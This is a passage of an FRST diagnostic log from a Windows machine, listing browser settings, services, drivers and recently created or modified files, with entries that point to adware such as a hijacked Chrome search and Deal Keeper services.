FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\administrator\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Plugin HKCU: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\administrator\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF user.js: detected! => C:\Users\administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jyilqp0h.default\user.js
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: avast! Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2013-09-25]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://mysearch.avg.com?cid={78BAED99-C67D-40EC-941A-FEA0F7387BF3}&mid=2a7b3dbee1bd47d2a5d36d16b2720196-ad1491be2ce6c122f6b66faa90e70c2decf7d34c&lang=en&ds=rc011&coid=avgtbdisrc&cmpid=&pr=sa&d=2014-03-19 13:43:44&v=18.1.0.443&pid=safeguard&sg=&sap=hp"
CHR DefaultSearchKeyword: Default -> astromenda.com
CHR DefaultSearchURL: Default -> http://astromenda.co...r=828474337&ir=
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?client=chrome&hl={language}&q={searchTerms}
CHR Profile: C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-10-11]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-05]
CHR Extension: (YouTube) - C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-10-11]
CHR Extension: (Google Search) - C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-10-11]
CHR Extension: (Google Wallet) - C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-11]
CHR Extension: (Gmail) - C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-10-11]
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 ADExchange; C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe [44736 2013-10-24] (ArcSoft, Inc.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [46808 2013-08-30] (AVAST Software)
R2 FJTWMKSV; C:\Windows\twain_32\fjscan32\FJTWMKSV.exe [45056 2007-03-08] (PFU LIMITED) [File not signed]
R2 IDriveService; C:\Program Files (x86)\IDriveWindows\id_service.exe [95280 2013-12-22] (Prosoftnet)
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [129856 2012-07-05] (Intel Corporation)
R2 ISCTAgent; C:\Program Files\Intel\Intel® Smart Connect Technology Agent\iSCTAgent.exe [133632 2012-02-09] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [166720 2012-08-21] (Intel Corporation)
R2 Service_DB; C:\Program Files (x86)\High Meadow Business Solutions\RetailEdge 8.2\Server\RetailEdge_Server_8_0.exe [7651840 2013-11-04] () [File not signed]
S3 ExpressAccountsService; "C:\Program Files (x86)\NCH Software\ExpressAccounts\expressaccounts.exe" -service [X]
S3 InventoriaService; "C:\Program Files (x86)\NCH Software\Inventoria\inventoria.exe" -service [X]
S2 Update Deal Keeper; "C:\Program Files (x86)\Deal Keeper\updateDealKeeper.exe" [X]
S2 Util Deal Keeper; "C:\Program Files (x86)\Deal Keeper\bin\utilDealKeeper.exe" [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswFsBlk; C:\Windows\System32\Drivers\aswFsBlk.sys [33400 2013-08-30] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [80816 2013-08-30] (AVAST Software)
R1 aswRdr; C:\Windows\System32\Drivers\aswrdr2.sys [72016 2013-08-30] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65336 2013-08-30] ()
R1 aswSnx; C:\Windows\System32\Drivers\aswSnx.sys [1030952 2013-08-30] (AVAST Software)
R1 aswSP; C:\Windows\System32\Drivers\aswSP.sys [378944 2013-08-30] (AVAST Software)
R1 aswTdi; C:\Windows\System32\Drivers\aswTdi.sys [64288 2013-08-30] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [204880 2013-08-30] ()
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28216 2012-09-01] (Intel Corporation)
R3 ikbevent; C:\Windows\System32\DRIVERS\ikbevent.sys [25536 2012-02-09] ()
R3 imsevent; C:\Windows\System32\DRIVERS\imsevent.sys [25536 2012-02-09] ()
R3 ISCT; C:\Windows\System32\DRIVERS\ISCTD64.sys [44992 2012-02-09] ()
R3 WPRO_41_2001; C:\Windows\System32\drivers\WPRO_41_2001.sys [34752 2014-09-03] ()

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-03 12:11 - 2014-09-03 12:12 - 00019205 _____ () C:\Users\administrator\Desktop\FRST.txt
2014-09-03 12:11 - 2014-09-03 12:11 - 00000000 ____D () C:\FRST
2014-09-03 12:10 - 2014-09-03 12:10 - 02104832 _____ (Farbar) C:\Users\administrator\Desktop\FRST64.exe
2014-09-03 10:36 - 2014-09-03 10:36 - 00000000 ____D () C:\_OTL
2014-09-03 10:05 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-09-03 10:04 - 2014-09-03 10:22 - 00000000 ____D () C:\AdwCleaner
2014-09-03 10:04 - 2014-09-03 10:02 - 01370467 _____ () C:\Users\administrator\Desktop\AdwCleaner.exe
2014-09-02 15:01 - 2014-09-02 15:01 - 00056274 _____ () C:\Users\administrator\Downloads\Extras.Txt
2014-09-02 15:00 - 2014-09-02 15:00 - 00258992 _____ () C:\Users\administrator\Downloads\OTL.Txt
2014-09-02 14:53 - 2014-09-02 14:53 - 00602112 _____ (OldTimer Tools) C:\Users\administrator\Desktop\OTL.exe
2014-08-29 18:00 - 2014-06-10 11:23 - 00000030 _____ () C:\AVScanner.ini
2014-08-27 12:19 - 2014-08-22 19:07 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-27 12:19 - 2014-08-22 18:45 - 00311808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2014-08-27 12:19 - 2014-08-22 17:59 - 03163648 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-26 22:42 - 2014-08-27 07:42 - 00000000 ____D () C:\ProgramData\b1b7a188cb35d8a4
2014-08-26 17:54 - 2014-05-14 09:23 - 02477536 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2014-08-26 17:54 - 2014-05-14 09:23 - 00700384 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2014-08-26 17:54 - 2014-05-14 09:23 - 00581600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2014-08-26 17:54 - 2014-05-14 09:23 - 00198600 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2014-08-26 17:54 - 2014-05-14 09:23 - 00179656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2014-08-26 17:54 - 2014-05-14 09:23 - 00058336 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2014-08-26 17:54 - 2014-05-14 09:23 - 00044512 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2014-08-26 17:54 - 2014-05-14 09:23 - 00038880 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2014-08-26 17:54 - 2014-05-14 09:23 - 00036320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2014-08-26 17:54 - 2014-05-14 09:21 - 02620928 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2014-08-26 17:54 - 2014-05-14 09:20 - 00097792 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2014-08-26 17:54 - 2014-05-14 09:20 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2014-08-26 17:54 - 2014-05-14 09:17 - 00092672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2014-08-26 17:54 - 2014-05-14 09:17 - 00033792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2014-08-26 13:21 - 2014-08-26 13:21 - 00002482 _____ () C:\Windows\System32\Tasks\0814tbUpdateInfo
2014-08-24 08:24 - 2014-08-25 00:24 - 00000089 _____ () C:\Users\administrator\AppData\Roaming\WB.CFG
2014-08-18 16:39 - 2014-08-18 16:39 - 00000587 _____ () C:\Users\administrator\Desktop\DETOX SUMMIT.lnk
2014-08-15 03:01 - 2014-06-30 15:24 - 00008856 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll
2014-08-15 03:01 - 2014-06-30 15:14 - 00008856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardres.dll
2014-08-15 03:01 - 2014-06-05 23:16 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
2014-08-15 03:01 - 2014-06-05 23:12 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2014-08-15 03:01 - 2014-03-09 14:48 - 01389208 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe
2014-08-15 03:01 - 2014-03-09 14:48 - 00171160 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll
2014-08-15 03:01 - 2014-03-09 14:47 - 00619672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardagt.exe
2014-08-15 03:01 - 2014-03-09 14:47 - 00099480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\infocardapi.dll
2014-08-15 02:47 - 2014-07-31 16:41 - 00348856 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-08-15 02:47 - 2014-07-31 16:16 - 00307384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-08-15 02:47 - 2014-07-25 07:52 - 23645696 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-08-15 02:47 - 2014-07-25 07:02 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-08-15 02:47 - 2014-07-25 07:01 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-08-15 02:47 - 2014-07-25 06:51 - 17524224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-08-15 02:47 - 2014-07-25 06:30 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-08-15 02:47 - 2014-07-25 06:28 - 00548352 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-08-15 02:47 - 2014-07-25 06:28 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-08-15 02:47 - 2014-07-25 06:25 - 02774528 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-08-15 02:47 - 2014-07-25 06:25 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-08-15 02:47 - 2014-07-25 06:11 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-08-15 02:47 - 2014-07-25 06:10 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-08-15 02:47 - 2014-07-25 06:04 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-08-15 02:47 - 2014-07-25 06:03 - 00598016 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-08-15 02:47 - 2014-07-25 06:00 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-08-15 02:47 - 2014-07-25 06:00 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-08-15 02:47 - 2014-07-25 05:59 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-08-15 02:47 - 2014-07-25 05:47 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-08-15 02:47 - 2014-07-25 05:40 - 00452096 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-08-15 02:47 - 2014-07-25 05:34 - 00455168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-08-15 02:47 - 2014-07-25 05:34 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-08-15 02:47 - 2014-07-25 05:33 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-08-15 02:47 - 2014-07-25 05:30 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-08-15 02:47 - 2014-07-25 05:28 - 05824512 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-08-15 02:47 - 2014-07-25 05:28 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-08-15 02:47 - 2014-07-25 05:21 - 02184704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-08-15 02:47 - 2014-07-25 05:19 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-08-15 02:47 - 2014-07-25 05:18 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-08-15 02:47 - 2014-07-25 05:17 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-08-15 02:47 - 2014-07-25 05:17 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-08-15 02:47 - 2014-07-25 05:12 - 00438784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-08-15 02:47 - 2014-07-25 05:10 - 00292864 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-08-15 02:47 - 2014-07-25 05:10 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-08-15 02:47 - 2014-07-25 05:08 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-08-15 02:47 - 2014-07-25 05:06 - 04204032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-08-15 02:47 - 2014-07-25 04:52 - 00367104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-08-15 02:47 - 2014-07-25 04:47 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-08-15 02:47 - 2014-07-25 04:43 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-08-15 02:47 - 2014-07-25 04:42 - 00692736 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-08-15 02:47 - 2014-07-25 04:39 - 02087936 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-08-15 02:47 - 2014-07-25 04:39 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-08-15 02:47 - 2014-07-25 04:36 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-08-15 02:47 - 2014-07-25 04:34 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-08-15 02:47 - 2014-07-25 04:29 - 00239616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-08-15 02:47 - 2014-07-25 04:23 - 13547008 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-08-15 02:47 - 2014-07-25 04:13 - 00526336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-08-15 02:47 - 2014-07-25 04:07 - 02001920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-08-15 02:47 - 2014-07-25 04:07 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-08-15 02:47 - 2014-07-25 04:03 - 11772928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-08-15 02:47 - 2014-07-25 03:52 - 02266624 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-08-15 02:47 - 2014-07-25 03:26 - 01431040 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-08-15 02:47 - 2014-07-25 03:17 - 00846336 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-08-15 02:47 - 2014-07-25 03:09 - 00704512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-08-15 02:47 - 2014-07-25 03:05 - 01792512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-08-15 02:47 - 2014-07-25 03:00 - 01169920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-08-15 02:46 - 2014-08-06 19:06 - 00529920 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-08-15 02:46 - 2014-08-06 19:01 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-08-13 02:39 - 2014-07-15 20:23 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-08-13 02:39 - 2014-07-15 19:46 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-08-13 02:39 - 2014-07-13 19:02 - 01216000 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2014-08-13 02:39 - 2014-07-13 18:40 - 00664064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2014-08-13 02:39 - 2014-07-08 19:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDYAK.DLL
2014-08-13 02:39 - 2014-07-08 19:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDTAT.DLL
2014-08-13 02:39 - 2014-07-08 19:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU1.DLL
2014-08-13 02:39 - 2014-07-08 19:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDBASH.DLL
2014-08-13 02:39 - 2014-07-08 19:03 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU.DLL
2014-08-13 02:39 - 2014-07-08 18:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDYAK.DLL
2014-08-13 02:39 - 2014-07-08 18:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDTAT.DLL
2014-08-13 02:39 - 2014-07-08 18:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU1.DLL
2014-08-13 02:39 - 2014-07-08 18:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU.DLL
2014-08-13 02:39 - 2014-07-08 18:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDBASH.DLL
2014-08-13 02:39 - 2014-07-08 15:38 - 00419992 _____ () C:\Windows\system32\locale.nls
2014-08-13 02:39 - 2014-07-08 15:30 - 00419992 _____ () C:\Windows\SysWOW64\locale.nls
2014-08-13 02:39 - 2014-06-15 19:10 - 00985536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2014-08-13 02:39 - 2014-06-03 03:02 - 03241984 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-08-13 02:39 - 2014-06-03 03:02 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2014-08-13 02:39 - 2014-06-03 03:02 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2014-08-13 02:39 - 2014-06-03 03:02 - 00112064 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2014-08-13 02:39 - 2014-06-03 02:29 - 02363392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-08-13 02:39 - 2014-06-03 02:29 - 01805824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2014-08-13 02:39 - 2014-06-03 02:29 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2014-08-13 02:38 - 2014-06-24 19:05 - 14175744 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2014-08-13 02:38 - 2014-06-24 18:41 - 12874240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2014-08-08 11:17 - 2014-08-08 11:17 - 00010634 _____ () C:\Users\administrator\Desktop\Book1.xlsx
2014-08-07 15:28 - 2014-08-08 11:22 - 00000000 ____D () C:\Users\administrator\AppData\Local\Apple Computer
2014-08-07 15:28 - 2014-08-07 15:28 - 00002503 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Safari.lnk
2014-08-07 15:28 - 2014-08-07 15:28 - 00002491 _____ () C:\Users\Public\Desktop\Safari.lnk
2014-08-07 15:27 - 2014-08-07 15:28 - 00000000 ____D () C:\Program Files (x86)\Safari
2014-08-07 15:27 - 2014-08-07 15:27 - 00000000 ____D () C:\ProgramData\Apple Computer
2014-08-07 15:26 - 2014-08-07 15:26 - 38494576 _____ (Apple Inc.) C:\Users\administrator\Downloads\SafariSetup.exe
2014-08-07 15:24 - 2014-08-07 15:24 - 00762096 _____ () C:\Users\administrator\Downloads\safari setup.exe
2014-08-07 15:23 - 2014-08-08 11:21 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-08-07 15:23 - 2014-08-07 15:23 - 00001159 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2014-08-07 15:23 - 2014-08-07 15:23 - 00001147 _____ () C:\Users\Public\Desktop\Mozilla Firefox.lnk
2014-08-07 15:22 - 2014-08-07 15:22 - 00244120 _____ () C:\Users\administrator\Downloads\Firefox Setup Stub 31.0.exe
2014-08-07 15:22 - 2014-08-07 15:22 - 00244120 _____ () C:\Users\administrator\Downloads\Firefox Setup Stub 31.0 (1).exe
2014-08-07 14:06 - 2014-08-07 14:06 - 00000000 ____D () C:\Users\administrator\Documents\VAL HEALTH RECORDS
2014-08-06 12:25 - 2014-08-06 12:25 - 00000000 ____D () C:\Users\administrator\Downloads\Driver Support
2014-08-06 12:24 - 2014-08-06 12:42 - 00000000 ____D () C:\Program Files\Earth Networks
2014-08-06 12:24 - 2014-08-06 12:24 - 00000264 _____ () C:\Users\administrator\Desktop\Cut the Rope.url
2014-08-06 12:24 - 2014-08-06 12:24 - 00000000 ____D () C:\Users\administrator\AppData\Local\IsolatedStorage
2014-08-06 12:24 - 2014-08-06 12:24 - 00000000 ____D () C:\ProgramData\Driver Support
2014-08-06 12:23 - 2014-08-06 12:23 - 01057176 _____ (Adobe) C:\Users\administrator\Downloads\adobe_flashplayer.exe
2014-08-06 12:23 - 2014-08-06 12:23 - 00749840 _____ ( ) C:\Users\administrator\Downloads\adobe_flash_setup.exe

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-03 12:12 - 2014-09-03 12:11 - 00019205 _____ () C:\Users\administrator\Desktop\FRST.txt
2014-09-03 12:11 - 2014-09-03 12:11 - 00000000 ____D () C:\FRST
2014-09-03 12:10 - 2014-09-03 12:10 - 02104832 _____ (Farbar) C:\Users\administrator\Desktop\FRST64.exe
2014-09-03 12:10 - 2013-09-25 08:03 - 02007836 _____ () C:\Windows\WindowsUpdate.log
2014-09-03 12:07 - 2013-10-11 11:53 - 00000128 _____ () C:\Windows\system32\config\netlogon.ftl
2014-09-03 12:07 - 2013-09-25 12:04 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-03 12:07 - 2013-09-25 08:20 - 00034752 _____ () C:\Windows\system32\Drivers\WPRO_41_2001.sys
2014-09-03 12:07 - 2013-09-25 08:15 - 00000828 _____ () C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job
2014-09-03 12:07 - 2009-07-13 22:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-03 12:06 - 2010-11-20 20:47 - 00276474 _____ () C:\Windows\PFRO.log
2014-09-03 12:06 - 2009-07-13 21:51 - 00046606 _____ () C:\Windows\setupact.log
2014-09-03 12:00 - 2013-09-25 12:05 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-09-03 11:59 - 2009-07-13 22:13 - 00787630 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-03 11:59 - 2009-07-13 21:45 - 00032080 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-03 11:59 - 2009-07-13 21:45 - 00032080 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-03 11:52 - 2013-10-15 09:32 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-09-03 11:52 - 2013-09-25 12:09 - 00004182 _____ () C:\Windows\System32\Tasks\avast! Emergency Update
2014-09-03 11:51 - 2013-09-25 08:15 - 00000830 _____ () C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job
2014-09-03 10:36 - 2014-09-03 10:36 - 00000000 ____D () C:\_OTL
2014-09-03 10:22 - 2014-09-03 10:04 - 00000000 ____D () C:\AdwCleaner
2014-09-03 10:02 - 2014-09-03 10:04 - 01370467 _____ () C:\Users\administrator\Desktop\AdwCleaner.exe
2014-09-03 09:13 - 2013-10-14 13:20 - 00000000 ____D () C:\Users\administrator\AppData\Roaming\TSScan
2014-09-02 15:01 - 2014-09-02 15:01 - 00056274 _____ () C:\Users\administrator\Downloads\Extras.Txt
2014-09-02 15:00 - 2014-09-02 15:00 - 00258992 _____ () C:\Users\administrator\Downloads\OTL.Txt
2014-09-02 14:53 - 2014-09-02 14:53 - 00602112 _____ (OldTimer Tools) C:\Users\administrator\Desktop\OTL.exe
2014-08-29 17:17 - 2013-09-25 08:27 - 00000000 ____D () C:\Windows\system32\appmgmt
2014-08-28 10:21 - 2013-09-25 08:26 - 00000000 ____D () C:\ProgramData\Temp
2014-08-28 03:53 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\rescache
2014-08-28 03:17 - 2009-07-13 21:45 - 00428608 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-27 07:42 - 2014-08-26 22:42 - 00000000 ____D () C:\ProgramData\b1b7a188cb35d8a4
2014-08-26 13:21 - 2014-08-26 13:21 - 00002482 _____ () C:\Windows\System32\Tasks\0814tbUpdateInfo
2014-08-25 00:24 - 2014-08-24 08:24 - 00000089 _____ () C:\Users\administrator\AppData\Roaming\WB.CFG
2014-08-22 19:07 - 2014-08-27 12:19 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-22 18:45 - 2014-08-27 12:19 - 00311808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2014-08-22 17:59 - 2014-08-27 12:19 - 03163648 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-18 16:39 - 2014-08-18 16:39 - 00000587 _____ () C:\Users\administrator\Desktop\DETOX SUMMIT.lnk
2014-08-15 03:18 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-08-15 03:00 - 2014-05-06 03:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-08-13 03:06 - 2013-10-11 12:38 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-08-13 01:01 - 2013-09-25 12:05 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-08-11 11:22 - 2014-05-15 14:21 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-08-08 11:22 - 2014-08-07 15:28 - 00000000 ____D () C:\Users\administrator\AppData\Local\Apple Computer
2014-08-08 11:21 - 2014-08-07 15:23 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-08-08 11:21 - 2014-03-10 19:14 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-08-08 11:21 - 2009-07-13 22:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
2014-08-08 11:20 - 2014-03-10 19:14 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-08-08 11:17 - 2014-08-08 11:17 - 00010634 _____ () C:\Users\administrator\Desktop\Book1.xlsx
2014-08-08 11:16 - 2014-02-25 15:11 - 00000000 ____D () C:\Users\administrator\AppData\Local\CrashDumps
2014-08-08 10:31 - 2009-07-13 19:34 - 00000580 _____ () C:\Windows\win.ini
